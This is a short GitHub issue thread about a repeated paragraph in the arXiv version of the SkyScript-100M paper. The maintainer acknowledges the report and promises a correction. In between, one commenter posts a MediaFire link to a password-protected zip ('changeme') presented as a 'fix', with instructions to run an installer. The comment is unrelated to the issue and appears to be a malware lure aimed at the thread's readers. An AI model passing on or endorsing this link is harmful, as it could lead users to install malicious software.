### ISSUE TITLE
Repetitive paragraphs in the arXiv version.

### ISSUE THREAD

**Issue by zchoi** [vaew/SkyScript-100M#2]
It seems that this paragraph is repeated on page 2 of the paper.
![image](https://github.com/user-attachments/assets/69b3b0ed-db84-4696-98e9-b6a3aa1499a7)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vaew** [comment]
Thank you for your valuable comments. We will correct this error as soon as possible☺️☺️
